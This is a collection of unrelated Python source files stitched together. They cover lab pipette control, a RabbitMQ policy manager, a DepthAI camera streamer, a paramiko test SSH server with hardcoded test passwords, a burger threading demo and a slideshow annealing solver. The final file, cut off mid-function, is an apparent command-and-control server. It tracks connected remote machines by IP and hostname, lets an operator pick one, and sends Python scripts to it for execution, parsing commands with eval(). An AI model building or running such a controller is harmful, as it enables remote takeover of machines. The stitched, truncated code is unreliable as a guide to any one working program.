dev.pressureDevice.setPressure(source='regulator', pressure=pressure)
self._checkStop(delay)
dev.pipetteRecord()['cleanCount'] += 1
dev.clean = True
self.resetPosition()
dev.newPatchAttempt()
return 'out'
def gotoApproachPosition(self, pos):
"""Move the pipette to a position *approachHeight* above *pos*: first adjust
x and z while leaving y unchanged, then move y over the target well.
"""
dev = self.dev
currentPos = dev.pipetteDevice.globalPosition()
# first move back in x and up in z, leaving y unchanged
approachPos1 = [pos[0], currentPos[1], pos[2] + self.config['approachHeight']]
fut = dev.pipetteDevice._moveToGlobal(approachPos1, 'fast')
self.waitFor(fut)
if self.resetPos is None:
self.resetPos = approachPos1
# now move y over the well
approachPos2 = [pos[0], pos[1], pos[2] + self.config['approachHeight']]
fut = dev.pipetteDevice._moveToGlobal(approachPos2, 'fast')
self.lastApproachPos = approachPos2
self.waitFor(fut)
def resetPosition(self):
if self.lastApproachPos is not None:
self.dev.pipetteDevice._moveToGlobal(self.lastApproachPos, 'fast').wait()
self.lastApproachPos = None
if self.resetPos is not None:
self.dev.pipetteDevice._moveToGlobal(self.resetPos, 'fast').wait()
self.resetPos = None
def cleanup(self):
dev = self.dev
try:
dev.pressureDevice.setPressure(source='atmosphere', pressure=0)
except Exception:
printExc("Error resetting pressure after clean")
self.resetPosition()
PatchPipetteState.cleanup(self)
|
PolicyManager.py
|
import os
import pika
import json
import time
import logging as log
from threading import Thread
from db.Models import Policy
class PolicyManager():
def __init__(self):
self.reload_policies()
self.needs_reloading = False
def use_policy(self, data_collector_id):
try:
if self.needs_reloading:
self.reload_policies()
if self.active_dc_id != data_collector_id:
self.active_policy = self.policy[self.policy_by_dc[data_collector_id]]
self.active_dc_id = data_collector_id
except Exception as exc:
log.error(f"Error trying to change the active policy: {exc}")
def is_enabled(self, alert_type):
try:
for item in self.active_policy.items:
if item.alert_type_code == alert_type:
return item.enabled
return True
except Exception as exc:
log.error(f"Error on is_enabled for alert {alert_type}. Exception: {exc}")
return False
def get_parameters(self, alert_type):
try:
for item in self.active_policy.items:
if item.alert_type_code == alert_type:
default_parameters = json.loads(item.alert_type.parameters)
default_parameters = {par : val['default'] for par, val in default_parameters.items()}
parameters = json.loads(item.parameters)
parameters = {par : val for par, val in parameters.items()}
# Add missing default parameters and update the item if needed
needs_update = False
for par, val in default_parameters.items():
if par not in parameters:
needs_update = True
parameters[par] = val
if needs_update:
item.parameters = json.dumps(parameters)
item.db_update()
return parameters
# If no item found for this alert_type, add it with default parameters and return them
return self.active_policy.add_missing_item(alert_type)
except Exception as exc:
log.error(f"Error getting parameters of alert {alert_type}. Exception: {exc}")
return {}
def subscribe_to_events(self):
try:
def connect_to_mq():
time.sleep(2)
rabbit_credentials = pika.PlainCredentials(username = os.environ["RABBITMQ_DEFAULT_USER"],
password = os.environ["RABBITMQ_DEFAULT_PASS"])
rabbit_parameters = pika.ConnectionParameters(host = os.environ["RABBITMQ_HOST"],
port = os.environ["RABBITMQ_PORT"],
credentials = rabbit_credentials)
connection = pika.BlockingConnection(rabbit_parameters)
channel = connection.channel()
channel.exchange_declare(exchange='policies_events', exchange_type='fanout')
result = channel.queue_declare(queue='', exclusive=True)
queue_name = result.method.queue
channel.queue_bind(exchange='policies_events', queue=queue_name)
channel.basic_consume(on_message_callback=self._handle_events, queue=queue_name, auto_ack=True)
channel.start_consuming()
thread = Thread(target = connect_to_mq)
thread.daemon = True
thread.start()
except Exception as exc:
log.error(f"Error: could not subscribe to policy events. Exception: {exc}")
def _handle_events(self, ch, method, properties, body):
self.needs_reloading = True
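# Reloading is deferred: the consumer thread only sets this flag, and the
# policies are actually re-read from the database on the next call to
# use_policy(), keeping database access on the caller's thread.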
def reload_policies(self):
try:
self.policy = {p.id : p for p in Policy.find()}
self.policy_by_dc = {dc.id : p.id for p in self.policy.values() for dc in p.data_collectors}
self.active_dc_id = None
self.active_policy = None
self.needs_reloading = False
except Exception as exc:
log.error(f"Error reloading policies:\n{exc}")
|
main.py
|
import json
import socketserver
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from io import BytesIO
from pathlib import Path
import sys
from socketserver import ThreadingMixIn
from time import sleep
import depthai as dai
import numpy as np
import cv2
from PIL import Image
import blobconverter
HTTP_SERVER_PORT = 8090
class TCPServerRequest(socketserver.BaseRequestHandler):
def handle(self):
# Handle is called each time a client is connected
# When OpenDataCam connects, do not return - instead keep the connection open and keep streaming data
# First send HTTP header
header = 'HTTP/1.0 200 OK\r\nServer: Mozarella/2.2\r\nAccept-Range: bytes\r\nConnection: close\r\nMax-Age: 0\r\nExpires: 0\r\nCache-Control: no-cache, private\r\nPragma: no-cache\r\nContent-Type: application/json\r\n\r\n'
self.request.send(header.encode())
while True:
sleep(0.1)
if hasattr(self.server, 'datatosend'):
self.request.send(self.server.datatosend.encode() + "\r\n".encode())
# HTTPServer MJPEG
class VideoStreamHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-type', 'multipart/x-mixed-replace; boundary=--jpgboundary')
self.end_headers()
while True:
sleep(0.1)
if hasattr(self.server, 'frametosend'):
image = Image.fromarray(cv2.cvtColor(self.server.frametosend, cv2.COLOR_BGR2RGB))
stream_file = BytesIO()
image.save(stream_file, 'JPEG')
self.wfile.write("--jpgboundary".encode())
self.send_header('Content-type', 'image/jpeg')
self.send_header('Content-length', str(stream_file.getbuffer().nbytes))
self.end_headers()
image.save(self.wfile, 'JPEG')
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
pass
# start TCP data server
server_TCP = socketserver.TCPServer(('localhost', 8070), TCPServerRequest)
th = threading.Thread(target=server_TCP.serve_forever)
th.daemon = True
th.start()
# start MJPEG HTTP Server
server_HTTP = ThreadedHTTPServer(('localhost', HTTP_SERVER_PORT), VideoStreamHandler)
th2 = threading.Thread(target=server_HTTP.serve_forever)
th2.daemon = True
th2.start()
# MobilenetSSD label texts
labelMap = ["background", "aeroplane", "bicycle", "bird", "boat", "bottle", "bus", "car", "cat", "chair", "cow",
"diningtable", "dog", "horse", "motorbike", "person", "pottedplant", "sheep", "sofa", "train", "tvmonitor"]
syncNN = True
def create_pipeline(depth):
# Start defining a pipeline
pipeline = dai.Pipeline()
pipeline.setOpenVINOVersion(version=dai.OpenVINO.Version.VERSION_2021_2)
# Define a source - color camera
colorCam = pipeline.createColorCamera()
if depth:
mobilenet = pipeline.createMobileNetSpatialDetectionNetwork()
monoLeft = pipeline.createMonoCamera()
monoRight = pipeline.createMonoCamera()
stereo = pipeline.createStereoDepth()
else:
mobilenet = pipeline.createMobileNetDetectionNetwork()
colorCam.setPreviewSize(300, 300)
colorCam.setResolution(dai.ColorCameraProperties.SensorResolution.THE_1080_P)
colorCam.setInterleaved(False)
colorCam.setColorOrder(dai.ColorCameraProperties.ColorOrder.BGR)
mobilenet.setBlobPath(str(blobconverter.from_zoo("mobilenet-ssd", shaves=6, version="2021.2")))
mobilenet.setConfidenceThreshold(0.5)
mobilenet.input.setBlocking(False)
if depth:
monoLeft.setResolution(dai.MonoCameraProperties.SensorResolution.THE_400_P)
monoLeft.setBoardSocket(dai.CameraBoardSocket.LEFT)
monoRight.setResolution(dai.MonoCameraProperties.SensorResolution.THE_400_P)
monoRight.setBoardSocket(dai.CameraBoardSocket.RIGHT)
# Setting node configs
stereo.initialConfig.setConfidenceThreshold(255)
stereo.depth.link(mobilenet.inputDepth)
mobilenet.setBoundingBoxScaleFactor(0.5)
mobilenet.setDepthLowerThreshold(100)
mobilenet.setDepthUpperThreshold(5000)
monoLeft.out.link(stereo.left)
monoRight.out.link(stereo.right)
xoutRgb = pipeline.createXLinkOut()
xoutRgb.setStreamName("rgb")
colorCam.preview.link(mobilenet.input)
if syncNN:
mobilenet.passthrough.link(xoutRgb.input)
else:
colorCam.preview.link(xoutRgb.input)
xoutNN = pipeline.createXLinkOut()
xoutNN.setStreamName("detections")
mobilenet.out.link(xoutNN.input)
if depth:
xoutBoundingBoxDepthMapping = pipeline.createXLinkOut()
xoutBoundingBoxDepthMapping.setStreamName("boundingBoxDepthMapping")
mobilenet.boundingBoxMapping.link(xoutBoundingBoxDepthMapping.input)
xoutDepth = pipeline.createXLinkOut()
xoutDepth.setStreamName("depth")
mobilenet.passthroughDepth.link(xoutDepth.input)
return pipeline
# Pipeline is defined, now we can connect to the device
with dai.Device(dai.OpenVINO.Version.VERSION_2021_2) as device:
cams = device.getConnectedCameras()
depth_enabled = dai.CameraBoardSocket.LEFT in cams and dai.CameraBoardSocket.RIGHT in cams
# Start pipeline
device.startPipeline(create_pipeline(depth_enabled))
print(f"DepthAI is up & running. Navigate to 'localhost:{str(HTTP_SERVER_PORT)}' with Chrome to see the mjpeg stream")
# Output queues will be used to get the rgb frames and nn data from the outputs defined above
previewQueue = device.getOutputQueue(name="rgb", maxSize=4, blocking=False)
detectionNNQueue = device.getOutputQueue(name="detections", maxSize=4, blocking=False)
if depth_enabled:
xoutBoundingBoxDepthMapping = device.getOutputQueue(name="boundingBoxDepthMapping", maxSize=4, blocking=False)
depthQueue = device.getOutputQueue(name="depth", maxSize=4, blocking=False)
frame = None
detections = []
startTime = time.monotonic()
counter = 0
fps = 0
color = (255, 255, 255)
while True:
inPreview = previewQueue.get()
frame = inPreview.getCvFrame()
inNN = detectionNNQueue.get()
detections = inNN.detections
counter+=1
current_time = time.monotonic()
if (current_time - startTime) > 1 :
fps = counter / (current_time - startTime)
counter = 0
startTime = current_time
if depth_enabled:
depth = depthQueue.get()
depthFrame = depth.getFrame()
depthFrameColor = cv2.normalize(depthFrame, None, 255, 0, cv2.NORM_INF, cv2.CV_8UC1)
depthFrameColor = cv2.equalizeHist(depthFrameColor)
depthFrameColor = cv2.applyColorMap(depthFrameColor, cv2.COLORMAP_HOT)
if len(detections) != 0:
boundingBoxMapping = xoutBoundingBoxDepthMapping.get()
roiDatas = boundingBoxMapping.getConfigData()
for roiData in roiDatas:
roi = roiData.roi
roi = roi.denormalize(depthFrameColor.shape[1], depthFrameColor.shape[0])
topLeft = roi.topLeft()
bottomRight = roi.bottomRight()
xmin = int(topLeft.x)
ymin = int(topLeft.y)
xmax = int(bottomRight.x)
ymax = int(bottomRight.y)
cv2.rectangle(depthFrameColor, (xmin, ymin), (xmax, ymax), color, cv2.FONT_HERSHEY_SCRIPT_SIMPLEX)
# If the frame is available, draw bounding boxes on it and show the frame
height = frame.shape[0]
width = frame.shape[1]
for detection in detections:
# Denormalize bounding box
x1 = int(detection.xmin * width)
x2 = int(detection.xmax * width)
y1 = int(detection.ymin * height)
y2 = int(detection.ymax * height)
try:
label = labelMap[detection.label]
except IndexError:
label = detection.label
cv2.putText(frame, str(label), (x1 + 10, y1 + 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, color)
cv2.putText(frame, "{:.2f}".format(detection.confidence*100), (x1 + 10, y1 + 35), cv2.FONT_HERSHEY_TRIPLEX, 0.5, color)
if depth_enabled:
cv2.putText(frame, f"X: {int(detection.spatialCoordinates.x)} mm", (x1 + 10, y1 + 50), cv2.FONT_HERSHEY_TRIPLEX, 0.5, color)
cv2.putText(frame, f"Y: {int(detection.spatialCoordinates.y)} mm", (x1 + 10, y1 + 65), cv2.FONT_HERSHEY_TRIPLEX, 0.5, color)
cv2.putText(frame, f"Z: {int(detection.spatialCoordinates.z)} mm", (x1 + 10, y1 + 80), cv2.FONT_HERSHEY_TRIPLEX, 0.5, color)
cv2.rectangle(frame, (x1, y1), (x2, y2), color, cv2.FONT_HERSHEY_SIMPLEX)
server_TCP.datatosend = str(label) + "," + f"{int(detection.confidence * 100)}%"
cv2.putText(frame, "NN fps: {:.2f}".format(fps), (2, frame.shape[0] - 4), cv2.FONT_HERSHEY_TRIPLEX, 0.4, color)
if depth_enabled:
new_width = int(depthFrameColor.shape[1] * (frame.shape[0] / depthFrameColor.shape[0]))
stacked = np.hstack([frame, cv2.resize(depthFrameColor, (new_width, frame.shape[0]))])
cv2.imshow("stacked", stacked)
server_HTTP.frametosend = stacked
else:
cv2.imshow("frame", frame)
server_HTTP.frametosend = frame
if cv2.waitKey(1) == ord('q'):
break
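# --- Hedged companion sketch (not part of the original script) ---
# TCPServerRequest above sends an HTTP header and then streams "\r\n"-terminated
# detection strings on port 8070. A minimal client for that feed (assuming the
# server is running on the same machine) could look like this:
def read_detection_feed(host="localhost", port=8070):
    import socket
    with socket.create_connection((host, port)) as sock:
        buffered = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            buffered += chunk
            # Print each complete line (the first few lines are the HTTP header).
            while b"\r\n" in buffered:
                line, buffered = buffered.split(b"\r\n", 1)
                print(line.decode(errors="replace"))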
|
sshserver_p3.py
|
# -*- coding:utf-8 -*-
# This module only supports Python 3
import socket,paramiko,random
from binascii import hexlify
from paramiko.py3compat import u, decodebytes
# pip3 install tests utils
from tests.utils import make_tests_data_path
from gsiot.v3 import *
from gsiot.v3.net.server import Server as gsServer
# setup logging
paramiko.util.log_to_file(make_tests_data_path('sshserver.log'))
host_key = paramiko.RSAKey(filename=make_tests_data_path('test_rsa.key'))
# host_key = paramiko.DSSKey(filename='test_dss.key')
printf('Read key: ' + u(hexlify(host_key.get_fingerprint())))
banner = u'\r\n\u6b22\u8fce\r\n'
event_timeout = 5
class Server(paramiko.ServerInterface):
# 'data' is the output of base64.b64encode(key)
# (using the "user_rsa_key" files)
data = (b'AAAAB3NzaC1yc2EAAAABIwAAAIEAyO4it3fHlmGZWJaGrfeHOVY7RWO3P9M7hp'
b'fAu7jJ2d7eothvfeuoRFtJwhUmZDluRdFyhFY/hFAh76PJKGAusIqIQKlkJxMC'
b'KDqIexkgHAfID/6mqvmnSJf0b5W8v5h2pI/stOSwTQ+pxVhwJ9ctYDhRSlF0iT'
b'UWT10hcuO4Ks8=')
good_pub_key = paramiko.RSAKey(data=decodebytes(data))
encodings = ['UTF-8', 'GBK', 'UTF-8\r\n', 'GBK\r\n']
def __init__(self):
self.shell_event = threading.Event()
self.exec_event = threading.Event()
self.encoding = random.choice(self.encodings)
self.password_verified = False
self.key_verified = False
def check_channel_request(self, kind, chanid):
if kind == 'session':
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_auth_password(self, username, password):
print('Auth attempt with username: {!r} & password: {!r}'.format(username, password)) # noqa
if (username in ['robey', 'bar', 'foo']) and (password == 'foo'):
return paramiko.AUTH_SUCCESSFUL
return paramiko.AUTH_FAILED
def check_auth_publickey(self, username, key):
print('Auth attempt with username: {!r} & key: {!r}'.format(username, u(hexlify(key.get_fingerprint())))) # noqa
if (username in ['robey', 'keyonly']) and (key == self.good_pub_key):
return paramiko.AUTH_SUCCESSFUL
if username == 'pkey2fa' and key == self.good_pub_key:
self.key_verified = True
return paramiko.AUTH_PARTIALLY_SUCCESSFUL
return paramiko.AUTH_FAILED
def check_auth_interactive(self, username, submethods):
if username in ['pass2fa', 'pkey2fa']:
self.username = username
prompt = 'Verification code: ' if self.password_verified else 'Password: ' # noqa
print(username, prompt)
return paramiko.InteractiveQuery('', '', prompt)
return paramiko.AUTH_FAILED
def check_auth_interactive_response(self, responses):
if self.username in ['pass2fa', 'pkey2fa']:
if not self.password_verified:
if responses[0] == 'password':
print('password verified')
self.password_verified = True
if self.username == 'pkey2fa':
return self.check_auth_interactive(self.username, '')
else:
print('wrong password: {}'.format(responses[0]))
return paramiko.AUTH_FAILED
else:
if responses[0] == 'passcode':
print('totp verified')
return paramiko.AUTH_SUCCESSFUL
else:
print('wrong totp: {}'.format(responses[0]))
return paramiko.AUTH_FAILED
else:
return paramiko.AUTH_FAILED
def get_allowed_auths(self, username):
if username == 'keyonly':
return 'publickey'
if username == 'pass2fa':
return 'keyboard-interactive'
if username == 'pkey2fa':
if not self.key_verified:
return 'publickey'
else:
return 'keyboard-interactive'
return 'password,publickey'
def check_channel_exec_request(self, channel, command):
if command != b'locale charmap':
ret = False
else:
ret = True
channel.send(self.encoding)
channel.shutdown(1)
self.exec_event.set()
return ret
def check_channel_shell_request(self, channel):
self.shell_event.set()
return True
def check_channel_pty_request(self, channel, term, width, height,
pixelwidth, pixelheight, modes):
return True
def check_channel_window_change_request(self, channel, width, height,
pixelwidth, pixelheight):
channel.send('resized')
return True
class sshServer_run(gsServer):
def __init__(self,**kwargv):
self.cfg=edict()
self.cfg.host=kwargv["host"]
self.cfg.port=kwargv["port"]
self.cfg.prototype="tcp"
self.cfg.datamodel="bin"
gsServer.__init__(self,self.cfg)
self.running=True
threading.Thread(target=self.run).start()
def run(self):
while self.running:
if self.quesocket.empty()==False:
printf('Got a connection!')
client=self.quesocket.get()
t = paramiko.Transport(client.dev)
t.load_server_moduli()
t.add_server_key(host_key)
server = Server()
try:
t.start_server(server=server)
except Exception as e:
print(e)
continue
# wait for auth
chan = t.accept(2)
if chan is None:
print('*** No channel.')
continue
username = t.get_username()
print('{} Authenticated!'.format(username))
server.shell_event.wait(timeout=event_timeout)
if not server.shell_event.is_set():
print('*** Client never asked for a shell.')
continue
server.exec_event.wait(timeout=event_timeout)
if not server.exec_event.is_set():
print('*** Client never asked for a command.')
continue
# chan.send('\r\n\r\nWelcome!\r\n\r\n')
print(server.encoding)
chan.send(banner.encode(server.encoding.strip()))
if username == 'bar':
msg = chan.recv(1024)
chan.send(msg)
elif username == 'foo':
lst = []
while True:
msg = chan.recv(32 * 1024)
lst.append(msg)
if msg.endswith(b'\r\n\r\n'):
break
data = b''.join(lst)
while data:
s = chan.send(data)
data = data[s:]
else:
chan.close()
t.close()
client.Close()
try:self.close()
except Exception:pass
else:pass
def run_ssh_server(port=2200, running=True):
# now connect
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('127.0.0.1', port))
sock.listen(100)
while running:
client, addr = sock.accept()
print('Got a connection!')
t = paramiko.Transport(client)
t.load_server_moduli()
t.add_server_key(host_key)
server = Server()
try:
t.start_server(server=server)
except Exception as e:
print(e)
continue
# wait for auth
chan = t.accept(2)
if chan is None:
print('*** No channel.')
continue
username = t.get_username()
print('{} Authenticated!'.format(username))
server.shell_event.wait(timeout=event_timeout)
if not server.shell_event.is_set():
print('*** Client never asked for a shell.')
continue
server.exec_event.wait(timeout=event_timeout)
if not server.exec_event.is_set():
print('*** Client never asked for a command.')
continue
# chan.send('\r\n\r\nWelcome!\r\n\r\n')
print(server.encoding)
chan.send(banner.encode(server.encoding.strip()))
if username == 'bar':
msg = chan.recv(1024)
chan.send(msg)
elif username == 'foo':
lst = []
while True:
msg = chan.recv(32 * 1024)
lst.append(msg)
if msg.endswith(b'\r\n\r\n'):
break
data = b''.join(lst)
while data:
s = chan.send(data)
data = data[s:]
else:
chan.close()
t.close()
client.close()
try:sock.close()
except Exception:pass
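# --- Hedged client sketch (illustration only, not part of the test server) ---
# One way to exercise run_ssh_server() is with a plain paramiko client using one
# of the password accounts accepted by check_auth_password() ('robey', 'bar' or
# 'foo', all with password 'foo'). The server waits for both a shell request and
# a 'locale charmap' exec request before sending its banner (see above):
def example_client(port=2200):
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect('127.0.0.1', port=port, username='foo', password='foo')
    shell = client.invoke_shell()
    _, stdout, _ = client.exec_command('locale charmap')
    print(stdout.read())  # the server replies with its randomly chosen encoding
    shell.close()
    client.close()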
if __name__ == '__main__':
run_ssh_server()
|
03-locking_restaurant.py
|
import time
import sys
from threading import Thread, Lock
from kitchen import Kitchen, Grill, CuttingBoard, Pantry
from burgers import Burger
from utils import (
ingredients_list_from_recipe,
prepare_ingerdient,
flat_generator,
select_ingredients,
gather_ingredients,
)
RECIPES = {
"cheeseburger": [
"bun-bottom",
"lettuce-slice",
"onion-ring",
"tomato-slice",
"grilled-beefpatty",
"cheese-slice",
"bun-top",
]
}
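# The Locking* wrappers below follow one pattern: each shared appliance gets its
# own Lock, and use() only runs while holding that lock, so two burger threads
# can never occupy the same grill or cutting board at the same time.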
class LockingCuttingBoard(CuttingBoard):
def __init__(self, lock, *args, **kwargs):
super().__init__(*args, **kwargs)
self.lock = lock
def use(self, *args, **kwargs):
with self.lock:
return super().use(*args, **kwargs)
class LockingGrill(Grill):
def __init__(self, lock, *args, **kwargs):
super().__init__(*args, **kwargs)
self.lock = lock
def use(self, *args, **kwargs):
with self.lock:
return super().use(*args, **kwargs)
class LockingKitchen(Kitchen):
def __init__(self):
self.pantry = Pantry()
self.cutting_board = LockingCuttingBoard(Lock())
self.grill = LockingGrill(Lock())
kitchen = LockingKitchen()
results = []
def make_burger(order):
recipe = RECIPES[order]
ingredients_list = ingredients_list_from_recipe(recipe)
ingredients = gather_ingredients(ingredients_list, kitchen.pantry)
prepared_ingredients = [prepare_ingerdient(ingredient, kitchen) for ingredient in ingredients]
prepared_ingredients = list(flat_generator(prepared_ingredients))
results.append(Burger(order, select_ingredients(recipe, prepared_ingredients)))
if __name__ == "__main__":
multiplier = int(sys.argv[2]) if len(sys.argv) > 2 else 1
orders = multiplier * sys.argv[1].split(",")
threads = []
start_time = time.time()
for order in orders:
t = Thread(target=make_burger, args=(order,))
t.start()
threads.append(t)
for t in threads:
t.join()
for burger in results:
burger.taste(RECIPES[order])
print(f"You can eat your delicious '{burger}'")
print(f"Delivered {len(orders)} burgers in {time.time()-start_time}s")
|
run.py
|
#!/usr/bin/env python3
import sys
import argparse
import multiprocessing
import random
from dataclasses import dataclass
from threading import Thread, Lock
from typing import List, Set, Optional
import simanneal
import myio
lock = Lock()
photos = []
vertical_photos = []
horizontal_photos = []
best = -1
def delta_for_swap(sol, a, b):
if a > b:
a, b = b, a
previous = 0
next = 0
if a > 0:
previous += transition_score(sol[a - 1], sol[a])
next += transition_score(sol[a - 1], sol[b])
if a < len(sol) - 1:
previous += transition_score(sol[a], sol[a + 1])
next += transition_score(sol[b], sol[a + 1])
if b > 0:
previous += transition_score(sol[b - 1], sol[b])
next += transition_score(sol[b - 1], sol[a])
if b < len(sol) - 1:
previous += transition_score(sol[b], sol[b + 1])
next += transition_score(sol[a], sol[b + 1])
return next - previous
class AnnealIt(simanneal.Annealer):
def __init__(self, id, state, score: int):
super().__init__(state)
self.id = str(id)
print(f"Thread {self.id} building the annealer")
self.copy_strategy = 'method'
self.steps = 42 # TODO: asd
self.step = 0
self.current_obj = score
print(f"Thread {self.id}: Score before annealing = {self.current_obj}, annealing begins")
def move(self):
self.step += 1
#for i in range(1, int((float(len(self.state))) * (1.0 - self.step/self.steps))):
a = random.randint(0, len(self.state) - 1)
b = random.randint(0, len(self.state) - 1)
while b == a:
b = random.randint(0, len(self.state) - 1)
delta = delta_for_swap(self.state, a, b)
self.current_obj += delta
self.state[a], self.state[b] = self.state[b], self.state[a]
def energy(self):
return -self.current_obj
def compute_it(id, output_file: str):
# global vertical_photos
global best
v = vertical_photos.copy()
h = horizontal_photos.copy()
iv = 0
ih = 0
local_random = random.Random()
seeeeeeeeed = random.randint(0, sys.maxsize) + (id*100)**3
local_random.seed(seeeeeeeeed)
print(f"Thread {str(id)} has seed {str(seeeeeeeeed)}")
local_random.shuffle(v)
local_random.shuffle(h)
print(f"Thread {str(id)}: shuffled")
x0 = []
vmax = len(v) - (len(v) % 2)
while iv < vmax or ih < len(h):
if iv < vmax:
slide = Slide(v[iv], v[iv + 1])
iv += 2
x0.append(slide)
if ih < len(h):
slide = Slide(h[ih])
ih += 1
x0.append(slide)
print(f"Thread {str(id)}: x0 ready")
score = objective(x0)
print(f"Thread {str(id)}: score for x0 ready")
# annealer = AnnealIt(id, x0, score)
# auto_schedule = annealer.auto(minutes=0.2)
score = local_search(x0, score)
local_best = x0
for i in range(0, 3):
annealer = AnnealIt(id, local_best, score)
# annealer.set_schedule(auto_schedule)
local_best, score = annealer.anneal()
score = -score
print(f"Thread {str(id)}: Annealed it! {score}")
prev_score = score
score = local_search(local_best, score)
if score > best:
lock.acquire()
if score > best:
print(f"New best by {str(id)}: {str(score)}")
best = score
write_output(output_file, local_best)
lock.release()
else:
lock.release()
print(f"Thread {str(id)}: worse, {score} < {best}")
else:
print(f"Thread {str(id)}: worse, {score} < {best}")
if prev_score == score:
print("Giving up")
break
# COMPUTE IT
# for x in sorted(listone, key=lambda el: el.cose, reverse=True)
def main(input_file: str, output_file: str):
file_lines = myio.read(input_file)
nlines = int(file_lines[0])
for i, line in enumerate(file_lines[1:]):
pieces = line.split(' ')
photo = Foto(i, pieces[0], pieces[1], set(pieces[2:]))
photos.append(photo)
if photo.is_vertical():
vertical_photos.append(photo)
else:
horizontal_photos.append(photo)
workers = []
for i in range(0, multiprocessing.cpu_count()):
workers.append(Thread(target=compute_it, args=(i, output_file)))
workers[-1].start()
for worker in workers:
# Workers of the world, unite!
worker.join()
# compute_it(-1, output_file)
@dataclass
class Foto:
id: int
orientation: str
n_tags: int
tags: Set[str]
def is_vertical(self):
return self.orientation == 'V'
class Slide:
def __init__(self, first: Foto, second: Optional[Foto]=None):
self.photo1 = first
self.photo2 = second
if self.photo2 is None:
self.tags = self.photo1.tags
self.vertical = False
else:
if self.photo1.id > self.photo2.id: # swap swap swap
self.photo1, self.photo2 = self.photo2, self.photo1
self.tags = self.photo1.tags.union(self.photo2.tags)
self.vertical = True
def ids(self):
if self.vertical:
return f"{str(self.photo1.id)} {str(self.photo2.id)}"
else:
return str(self.photo1.id)
def local_search(sol: List[Slide], current_obj: int) -> int:
prev_obj = current_obj
tot = len(sol)
for i in range(1, tot):
j = i - 1
delta = delta_for_swap(sol, j, i)
if delta > 0:
current_obj += delta
sol[i - 1], sol[i] = sol[i], sol[i - 1]
print(f"Local search done: from {prev_obj} to {current_obj}")
return current_obj
def write_output(output_file, slides: List[Slide]):
# noinspection PyListCreation
file_lines = []
file_lines.append(str(len(slides)))
for slide in slides:
file_lines.append(slide.ids())
myio.write(output_file, file_lines)
def transition_score(first: Slide, second: Slide):
n1 = len(first.tags.intersection(second.tags))
n2 = len(first.tags.difference(second.tags))
n3 = len(second.tags.difference(first.tags))
return min(n1, n2, n3)
def objective(sol: List[Slide]):
if len(sol) == 0:
return 0
score = 0
for i in range(0, len(sol) - 1):
score += transition_score(sol[i], sol[i+1])
#print(f"Nice score, dude: {str(score)}")
return score
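# --- Worked example (illustration only) ---
# transition_score() is the usual slideshow "interest factor": the minimum of
# the tags two consecutive slides share, the tags only in the first slide, and
# the tags only in the second. For tag sets {a, b, c} and {b, c, d}:
#   common = {b, c} -> 2, only-first = {a} -> 1, only-second = {d} -> 1,
#   so the transition contributes min(2, 1, 1) = 1 to objective().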
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Do awesome computations, yeha.')
parser.add_argument('input', type=str, help="Input file name")
parser.add_argument('output', type=str, help="Output file name")
args = parser.parse_args()
main(args.input, args.output)
|
server.py
|
import asyncio
import websockets
import threading
import queue
import glob
import json
import time
import sys
import os
SOCKETS = []
PORT = 8765
async def handle_conn(websocket, path):
data = json.loads(await websocket.recv())
sys_info = data.copy()
sys_info["id"] = len(SOCKETS)
sys_info["alive"] = True
sys_info["ip"] = websocket.remote_address[0]
nick = "{}/{}/{}".format(sys_info["ip"], sys_info["hostname"], sys_info["id"])
sys_info["nick"] = nick
system = (websocket, sys_info)
SOCKETS.append(system)
try:
async for message in websocket:
try:
msg = json.loads(message)
if msg.get("result"):
result = msg["result"]
print(f"\n[{nick}] {result}\n")
if msg.get("error"):
error = msg["error"]
print(f"\n[{nick}] {error}\n")
except Exception as e:
print(e)
except Exception:
system[1]["alive"] = False
def start_server_async():
def _start():
asyncio.set_event_loop(asyncio.new_event_loop())
start_server = websockets.serve(handle_conn, "0.0.0.0", PORT)
asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()
thread = threading.Thread(target=_start)
thread.start()
def _parse_cmd(cmd):
if "(" in cmd and ")" in cmd:
args_idx = cmd.index("(")
method = cmd[:args_idx]
args = eval(cmd[args_idx:])
if type(args) != tuple:
args = (args,)
elif " " in cmd:
cmd_split = cmd.split(" ")
method = cmd_split[0]
args = (eval(cmd_split[1]),)
else:
method = cmd
args = tuple()
return method, args
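# --- Illustrative parses (sketch only; 'download' is a hypothetical script name) ---
#   _parse_cmd("list")                 -> ("list", ())
#   _parse_cmd("interact 2")           -> ("interact", (2,))
#   _parse_cmd("download('a.txt', 3)") -> ("download", ("a.txt", 3))
# Arguments are passed through eval(), so they must be valid Python literals.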
def create_script_payload(script_name):
script_fn = os.path.join("scripts", script_name + ".py")
with open(script_fn, "r") as f:
script = f.read()
init_method = f"main_{script_name}_{time.time()}".replace(".", "")
script = script.replace("def main(", f"def {init_method}(")
return init_method, script
def send_async(socket, data):
async def _send():
await socket.send(data)
asyncio.get_event_loop().run_until_complete(_send())
def handle_cmd(sys_idx, method, params):
if method == "exit":
sys.exit(0)
elif method in ["list", "ls"]:
for i, (_, sys_info) in enumerate(SOCKETS):
if sys_info["alive"]:
print(i, sys_info["nick"])
elif method in ["interact", "i"]:
if len(params) == 0 or params[0] < 0 or params[0] >= len(SOCKETS):
sys_idx = -1
else:
sys_idx = params[0]
elif method == "scripts":
for fn in glob.iglob("scripts/*.py"):
script_name = os.path.basename(fn)[:-3]
print(script_name)
elif method == "info":
print(SOCKETS[sys_idx][1])
elif method == "nick":
SOCKETS[sys_idx][1]["nick"] = params[0]
elif sys_idx != -1:
init_method, script = create_script_payload(method)
send_async(SOCKETS[sys_idx][0], json.dumps({"script": script, "init_method": init_method, "args": params}))
return sys_idx
def run_interactive():
sys_idx = -1
while True:
prompt = " > "
if sys_idx != -1:
nick = SOCKETS[sys_idx][1]["nick"]
prompt = f"[{nick}] >> "
cmd = input(prompt)
if cmd.strip() == "":
continue
try:
method, params = _parse_cmd(cmd)
